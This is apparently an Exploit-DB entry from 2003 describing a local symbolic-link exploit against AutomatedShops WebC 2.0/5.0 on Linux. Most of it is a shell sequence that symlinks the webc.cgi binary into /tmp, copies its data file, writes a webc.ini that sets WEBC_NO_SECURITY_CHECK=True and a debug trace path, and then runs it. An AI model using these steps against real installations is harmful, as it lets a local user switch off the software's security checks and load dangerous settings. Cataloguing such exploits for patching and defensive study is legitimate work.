AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness

2003-04-03T00:00:00
ID EDB-ID:22456
Type exploitdb
Reporter Carl Livitt
Modified 2003-04-03T00:00:00

Description

AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/7272/info

It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables. 

$ cd /tmp
$ ln -s /usr/local/apache/cgi-bin/webc.cgi webc.cgi
$ cp /usr/local/apache/cgi-bin/webc.emf .
$ echo "WEBC_NO_SECURITY_CHECK=True" > webc.ini
$ echo "HTML_TRACE_REQUEST=/tmp/.debug1" >> webc.ini
$ ./webc.cgi